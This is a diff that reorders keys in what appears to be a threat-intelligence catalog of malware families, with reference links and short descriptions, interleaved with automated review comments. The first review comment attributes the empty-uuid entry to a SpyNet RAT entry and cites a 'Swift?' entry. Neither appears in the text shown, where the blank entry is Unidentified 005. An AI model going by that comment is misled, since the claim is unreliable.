"https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8", - "value": "tDiscoverer", - "description": "" + "value": "tDiscoverer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess", "http://www.clearskysec.com/tulip/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", - "value": "TDTESS", - "description": "" + "value": "TDTESS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "06e0d676-8160-4b65-b6ea-d7634c962809", - "value": "TeleBot", - "description": "" + "value": "TeleBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor", "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/", "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b71f1656-975a-4daa-8109-00c30fd20410", - "value": "TeleDoor", - "description": "" + "value": "TeleDoor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74", - "value": "Tempedreve", - "description": "" + "value": "Tempedreve" }, { + "description": "", "meta": { - "synonyms": [ - "Fakem RAT" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat", "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf", "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf", "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" - ] + ], + "synonyms": [ + "Fakem RAT" + ], + "type": [] }, "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", - 
"value": "Terminator RAT", - "description": "" + "value": "Terminator RAT" }, { + "description": "", "meta": { - "synonyms": [ - "cryptesla" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt", "https://blogs.cisco.com/security/talos/teslacrypt", 
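Review bot: The entry whose only reference is `https://malpedia.caad.fkie.fraunhofer.de/details/win.spynet_rat` still has `"uuid": ""` and the new side re-emits `"value": ""`, so this cluster value has neither an identifier nor a name, while every other entry in the hunk carries a UUID. An empty uuid cannot be targeted by `related` links or by event attributes, and two such entries would be indistinguishable, so it should not ship in this form; either fill it in, e.g. `"uuid": "<generated UUIDv4>",` and `"value": "SpyNet RAT"` (name presumably taken from the reference slug, to be confirmed), or remove the entry until it can be completed. Whether the repository's validation rejects an empty uuid I cannot tell from this hunk. The `"value": "Swift?"` entry later in the same hunk also reads like a placeholder name and deserves a look in the same pass.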
@@ -13960,102 +13960,100 @@
 "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf",
 "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/",
 "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack"
- ]
+ ],
+ "synonyms": [
+ "cryptesla"
+ ],
+ "type": []
 },
 "uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad",
- "value": "TeslaCrypt",
- "description": ""
+ "value": "TeslaCrypt"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Alphabot"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos",
 "https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market"
- ]
+ ],
+ "synonyms": [
+ "Alphabot"
+ ],
+ "type": []
 },
 "uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25",
- "value": "Thanatos",
- "description": ""
+ "value": "Thanatos"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom",
 "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/",
 "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/",
 "https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34",
- "value": "Thanatos Ransomware",
- "description": ""
+ "value": "Thanatos Ransomware"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte",
 "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4",
- "value": "ThreeByte",
- "description": ""
+ "value": "ThreeByte"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief",
 "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52",
- "value": "ThumbThief",
- "description": ""
+ "value": "ThumbThief"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "e55dcdec-0365-4ee0-96f8-7021183845a3",
- "value": "Thunker",
- "description": ""
+ "value": "Thunker"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool",
 "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/",
 "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca",
- "value": "Tidepool",
- "description": ""
+ "value": "Tidepool"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Zusy",
- "TinyBanker",
- "Illi"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba",
 "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/",
@@ -14068,34 +14066,33 @@
 "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/",
 "http://contagiodump.blogspot.com/2012/06/amazon.html",
 "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/"
- ]
+ ],
+ "synonyms": [
+ "Zusy",
+ "TinyBanker",
+ "Illi"
+ ],
+ "type": []
 },
 "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88",
- "value": "Tinba",
- "description": ""
+ "value": "Tinba"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader",
 "https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144",
- "value": "TinyLoader",
- "description": ""
+ "value": "TinyLoader"
 },
 {
+ "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.",
 "meta": {
- "synonyms": [
- "NukeBot",
- "Nuclear Bot",
- "MicroBankingTrojan",
- "Xbot"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke",
 "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596",
@@ -14106,106 +14103,107 @@
"https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/",
"https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/",
"https://krebsonsecurity.com/tag/nuclear-bot/"
- ]
+ ],
+ "synonyms": [
+ "NukeBot",
+ "Nuclear Bot",
+ "MicroBankingTrojan",
+ "Xbot"
+ ],
+ "type": []
},
"uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838",
- "value": "TinyNuke",
- "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor."
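Review bot: The `+ "description": ""` lines added for Tinba and TinyLoader here (and for most entries in the later hunks of this file) write an empty string where the field is simply unknown, so a consumer cannot tell "no description yet" from a deliberately blank one. If the galaxy schema does not require the key, the sort step that produced this diff could omit empty descriptions instead of emitting `"description": ""`, and the same holds for `"type": []`. Because this commit is a pure reorder, it is also worth confirming nothing was dropped by comparing key-sorted renderings of the old and new file (`jq -S .` on both, then diff), since a lost entry is hard to spot by eye in a diff this size.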
+ "value": "TinyNuke"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon",
"https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c",
- "value": "TinyTyphon",
- "description": ""
+ "value": "TinyTyphon"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot",
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c",
- "value": "TinyZbot",
- "description": ""
+ "value": "TinyZbot"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8",
- "value": "Tiop",
- "description": ""
+ "value": "Tiop"
},
{
+ "description": "",
"meta": {
- "synonyms": [
- "Gheg"
- ],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee",
"https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/",
"https://www.cert.pl/en/news/single/tofsee-en/",
"https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/"
- ]
+ ],
+ "synonyms": [
+ "Gheg"
+ ],
+ "type": []
},
"uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49",
- "value": "Tofsee",
- "description": ""
+ "value": "Tofsee"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker",
"http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/",
"http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2",
- "value": "TorrentLocker",
- "description": ""
+ "value": "TorrentLocker"
},
{
+ "description": "",
"meta": {
- "synonyms": [
- "huntpos"
- ],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter",
"http://adelmas.com/blog/treasurehunter.php",
"https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/",
"https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html"
- ]
+ ],
+ "synonyms": [
+ "huntpos"
+ ],
+ "type": []
},
"uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2",
- "value": "TreasureHunter",
- "description": ""
+ "value": "TreasureHunter"
},
{
+ "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Marco Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Marco enabled > Trickbot installed",
"meta": {
- "synonyms": [
- "Trickster",
- "TheTrick",
- "TrickLoader"
- ],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot",
"https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/",
@@ -14244,19 +14242,20 @@
"https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer",
"https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf",
"https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/"
- ]
+ ],
+ "synonyms": [
+ "Trickster",
+ "TheTrick",
+ "TrickLoader"
+ ],
+ "type": []
},
"uuid": "c824813c-9c79-4917-829a-af72529e8329",
- "value": "TrickBot",
- "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Marco Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Marco enabled > Trickbot installed"
+ "value": "TrickBot"
},
{
+ "description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers.",
"meta": {
- "synonyms": [
- "Trisis",
- "HatMan"
- ],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.triton",
"https://dragos.com/blog/trisis/TRISIS-01.pdf",
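Review bot: The TrickBot description re-emitted as a `+` line in the preceding hunk still reads `Marco Enabled` and `Marco enabled` in infection vectors 2 and 3, while vector 1 correctly says `Macro Enabled`; since the line is rewritten anyway, correct both to `Macro Enabled` / `Macro enabled`. The same line has `Feb 2018 - Theft Bitcoin`, which reads more naturally as `Feb 2018 - Bitcoin theft`. Leaving a known-wrong spelling in a curated description is the kind of thing that later gets copied into reports verbatim.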
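Review bot: The Triton description moved into the `+` line at the end of this hunk is hard to parse as written (`Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers.`); the modifier belongs with the controllers, e.g. `Malware targeting Triconex Safety Instrumented System (SIS) controllers, which are commonly used in Industrial Control Systems (ICS).` The entry's `meta` block continues into the next hunk.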
@@ -14264,598 +14263,598 @@
"https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html",
"https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware",
"https://github.com/ICSrepo/TRISIS-TRITON-HATMAN"
- ]
+ ],
+ "synonyms": [
+ "Trisis",
+ "HatMan"
+ ],
+ "type": []
},
"uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15",
- "value": "win.triton",
- "description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers."
+ "value": "win.triton"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat",
"https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf",
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
"https://github.com/5loyd/trochilus/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e",
- "value": "Trochilus RAT",
- "description": ""
+ "value": "Trochilus RAT"
},
{
+ "description": "",
"meta": {
- "synonyms": [
- "Shade"
- ],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh",
"https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/",
"https://securelist.com/the-shade-encryptor-a-double-threat/72087/"
- ]
+ ],
+ "synonyms": [
+ "Shade"
+ ],
+ "type": []
},
"uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126",
- "value": "Troldesh",
- "description": ""
+ "value": "Troldesh"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "48deadcc-1a67-442d-b181-fdaaa337c4bb",
- "value": "Trump Ransom",
- "description": ""
+ "value": "Trump Ransom"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833",
- "value": "Tsifiri",
- "description": ""
+ "value": "Tsifiri"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup",
"https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf",
- "value": "TURNEDUP",
- "description": ""
+ "value": "TURNEDUP"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin",
"https://www.lastline.com/labsblog/tyupkin-atm-malware/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c",
- "value": "Tyupkin",
- "description": ""
+ "value": "Tyupkin"
},
{
+ "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.",
"meta": {
- "synonyms": [
- "Akagi"
- ],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme",
"https://github.com/hfiref0x/UACME"
- ]
+ ],
+ "synonyms": [
+ "Akagi"
+ ],
+ "type": []
},
"uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371",
- "value": "UACMe",
- "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors."
+ "value": "UACMe"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos",
"https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns",
"https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc",
- "value": "UDPoS",
- "description": ""
+ "value": "UDPoS"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix",
"https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd",
- "value": "Uiwix",
- "description": ""
+ "value": "Uiwix"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "72961adc-ace1-4593-99f1-266119ddeccb",
- "value": "Unidentified 001",
- "description": ""
+ "value": "Unidentified 001"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1",
- "value": "Unidentified 003",
- "description": ""
+ "value": "Unidentified 003"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_005"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "",
- "value": "",
- "description": ""
+ "value": ""
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6",
- "value": "Unidentified 006",
- "description": ""
+ "value": "Unidentified 006"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware",
"http://blog.talosintelligence.com/2017/02/korean-maldoc.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956",
- "value": "Unidentified 013 (Korean)",
- "description": ""
+ "value": "Unidentified 013 (Korean)"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7",
"https://wikileaks.org/ciav7p1/cms/page_34308128.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "40c66571-164c-4050-9c84-f37c9cd84055",
- "value": "Unidentified 020 (Vault7)",
- "description": ""
+ "value": "Unidentified 020 (Vault7)"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f",
- "value": "Unidentified 022 (Ransom)",
- "description": ""
+ "value": "Unidentified 022 (Ransom)"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b",
- "value": "Unidentified 023",
- "description": ""
+ "value": "Unidentified 023"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom",
"https://twitter.com/malwrhunterteam/status/789161704106127360"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b",
- "value": "Unidentified 024 (Ransomware)",
- "description": ""
+ "value": "Unidentified 024 (Ransomware)"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud",
"http://malware-traffic-analysis.net/2016/05/09/index.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "f43a0e38-2394-4538-a123-4a0457096058",
- "value": "Unidentified 025 (Clickfraud)",
- "description": ""
+ "value": "Unidentified 025 (Clickfraud)"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b",
- "value": "Unidentified 028",
- "description": ""
+ "value": "Unidentified 028"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "aff47054-7130-48ca-aa2c-247bdf44f180",
- "value": "Unidentified 029",
- "description": ""
+ "value": "Unidentified 029"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030",
"https://twitter.com/JaromirHorejsi/status/877811773826641920"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "7287a0b0-b943-4007-952f-07b9475ec184",
- "value": "Filecoder",
- "description": ""
+ "value": "Filecoder"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e",
- "value": "Unidentified 031",
- "description": ""
+ "value": "Unidentified 031"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_032",
"https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "799921d7-48e8-47a6-989e-487b527af37a",
- "value": "Unidentified 032",
- "description": ""
+ "value": "Unidentified 032"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_033"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f",
- "value": "Unidentified 033",
- "description": ""
+ "value": "Unidentified 033"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_034",
"https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947",
- "value": "Unidentified 034",
- "description": ""
+ "value": "Unidentified 034"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_035"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "ba014661-d1d4-4a69-a698-9f4120de9260",
- "value": "Unidentified 035",
- "description": ""
+ "value": "Unidentified 035"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2",
- "value": "Unidentified 037",
- "description": ""
+ "value": "Unidentified 037"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58",
- "value": "Unidentified 038",
- "description": ""
+ "value": "Unidentified 038"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "97c1524a-c052-49d1-8770-14b513d8a830",
- "value": "Unidentified 039",
- "description": ""
+ "value": "Unidentified 039"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "88d70171-fc89-44d1-8931-035c0b095247",
- "value": "Unidentified 041",
- "description": ""
+ "value": "Unidentified 041"
},
{
+ "description": "",
